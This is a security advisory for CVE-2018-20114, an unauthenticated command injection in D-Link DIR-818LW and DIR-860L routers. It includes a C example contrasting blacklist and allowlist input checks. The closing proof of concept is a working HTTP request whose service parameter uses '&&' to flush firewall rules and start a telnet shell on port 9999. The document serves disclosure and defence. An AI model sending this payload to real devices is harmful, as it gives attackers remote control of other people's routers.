CVE-2018-20114
D-Link Unauthenticated OS Command Injection

Exploit Author: pr0v3rbs@kaist.ac.kr

Vendor: D-Link

Firmware version: DIR-818LW_REVA - 2.05.B03, DIR-860L_REVB - 2.03.B03

Hardware Link: https://support.dlink.com/ProductInfo.aspx?m=DIR-818LW, https://support.dlink.com/ProductInfo.aspx?m=DIR-860L

Vulnerability details

I found an unauthenticated remote code execution vulnerability in the soapcgi_main function of the cgibin binary.

By sending an HTTP POST request to /soap.cgi on port 49152 with a crafted service query-string parameter, an unauthenticated remote attacker can execute shell commands on the device.

A similar vulnerability was already reported as CVE-2018-6530, and some firmware versions added character filtering with the strchr function in response.

However, the firmware versions DIR-818LW_REVA_PATCH_2.05.B03 and DIR-860L_REVB_2.03.B03 do not filter all of the dangerous characters.

The && sequence is not rejected, so the device can still be exploited by chaining commands with it.
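The following C example is added here to illustrate the failure mode described above; it is not code from the D-Link firmware or from the advisory author. The exact character set the patched cgibin rejects is not known from this advisory, so the blacklist below (";|`$") is an assumption chosen only to show how a strchr()-based blacklist that omits '&' lets the && chain through, while an allowlist of characters valid in a service name rejects it. The benign service value "ExampleService1" is constructed for the example; the malicious value is taken from the PoC below.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical reconstruction of a strchr()-based blacklist check.
 * ASSUMPTION: the banned set below is illustrative only; the real
 * firmware's set is not documented in the advisory. Note that '&'
 * is missing, which is exactly the gap the PoC relies on. */
static const char *banned_chars = ";|`$";

static bool blacklist_rejects(const char *service)
{
    for (const char *p = service; *p != '\0'; p++) {
        if (strchr(banned_chars, (unsigned char)*p) != NULL)
            return true;            /* a banned character was found */
    }
    return false;                   /* nothing matched: request accepted */
}

/* Hardened check: accept only characters that can legitimately appear
 * in a service identifier (letters, digits, '_', '-', '.', ':') and
 * reject everything else, including '&', whitespace and quotes.
 * An allowlist cannot be bypassed by a metacharacter the author forgot. */
static bool allowlist_accepts(const char *service)
{
    if (service == NULL || *service == '\0')
        return false;               /* empty service name is not useful */
    for (const char *p = service; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.' || c == ':'))
            return false;
    }
    return true;
}

/* Returns true when the blacklist lets a value through that the
 * allowlist would have rejected, i.e. the blacklist has a bypass. */
static bool blacklist_has_bypass(const char *service)
{
    return !blacklist_rejects(service) && !allowlist_accepts(service);
}

int main(void)
{
    /* Service value from the PoC (shortened) and a constructed benign one. */
    const char *attack = "&&iptables -P INPUT ACCEPT&&telnetd -p 9999&&";
    const char *benign = "ExampleService1";

    printf("attack: blacklist rejects=%d allowlist accepts=%d bypass=%d\n",
           blacklist_rejects(attack), allowlist_accepts(attack),
           blacklist_has_bypass(attack));
    printf("benign: blacklist rejects=%d allowlist accepts=%d bypass=%d\n",
           blacklist_rejects(benign), allowlist_accepts(benign),
           blacklist_has_bypass(benign));
    return 0;
}
```

Even a complete blacklist of shell metacharacters is only a mitigation; the underlying fix is to stop passing the service value to a shell at all.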

PoC

# nc 192.168.0.1 49152
POST /soap.cgi?service=&&iptables -P INPUT ACCEPT&&iptables -P FORWARD ACCEPT&&iptables -P OUTPUT ACCEPT&&iptables -t nat -P PREROUTING ACCEPT&&iptables -t nat -P OUTPUT ACCEPT&&iptables -t nat -P POSTROUTING ACCEPT&&telnetd -p 9999&& HTTP/1.1
Host: 192.168.0.1:49152
Accept-Encoding: identity
Content-Length: 16
SOAPAction: "whatever-serviceType#whatever-action"
Content-Type: text/xml

# telnet 192.168.0.1 9999